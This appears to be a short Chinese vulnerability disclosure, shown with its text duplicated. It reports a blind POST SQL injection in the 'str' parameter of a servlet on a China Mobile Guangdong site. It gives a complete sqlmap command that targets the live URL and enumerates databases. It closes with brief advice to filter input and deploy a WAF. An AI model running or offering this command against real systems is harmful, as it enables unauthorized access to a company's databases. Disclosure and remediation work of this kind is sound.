# 站点URL:http://gd.10086.cn/shadu/kvweb/index.jsp
来张高清大图
该站点 http://gd.10086.cn/shadu/servlet/QuestionNoteServlet 存在POST注入
我们用sqlmap来试试看,post DATA str参数存在注入
sqlmap -u "http://gd.10086.cn/shadu/servlet/QuestionNoteServlet" --data="date=1410850642000&nowPage=1&str=e" -p "str" --dbs
存在盲注
库非常多
危害还是很大的。库很多。
不深入了,没做任何导出数据操作。
# 站点URL:http://gd.10086.cn/shadu/kvweb/index.jsp
来张高清大图
该站点 http://gd.10086.cn/shadu/servlet/QuestionNoteServlet 存在POST注入
我们用sqlmap来试试看,post DATA str参数存在注入
sqlmap -u "http://gd.10086.cn/shadu/servlet/QuestionNoteServlet" --data="date=1410850642000&nowPage=1&str=e" -p "str" --dbs
存在盲注
库非常多
危害还是很大的。库很多。
不深入了,没做任何导出数据操作。
过滤,有钱搞个WAF